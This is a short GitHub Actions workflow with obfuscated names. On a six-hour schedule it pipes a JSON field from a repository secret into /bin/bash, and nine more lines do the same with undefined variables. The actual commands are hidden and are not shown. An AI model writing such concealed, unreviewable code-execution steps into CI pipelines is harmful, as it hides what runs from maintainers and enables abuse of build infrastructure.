name: fibertshirt

on:
  workflow_dispatch:
  schedule:
    - cron: '17 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fibertshirt
        env:
          koh026: ${{ secrets.koh026 }}
        run: |
          echo $koh026 | jq -r .jhmd543 | /bin/bash
          echo $qpgq069 | jq -r .x6 | /bin/bash
          echo $tk3835 | jq -r .ryc977 | /bin/bash
          echo $he84579 | jq -r .dn64901 | /bin/bash
          echo $kj04820 | jq -r .m3 | /bin/bash
          echo $b061 | jq -r .ojav19 | /bin/bash
          echo $sgfn724 | jq -r .kt2 | /bin/bash
          echo $ixsr19427 | jq -r .mk3900 | /bin/bash
          echo $yup1 | jq -r .xlis7 | /bin/bash
          echo $typpq8359 | jq -r .rg86 | /bin/bash

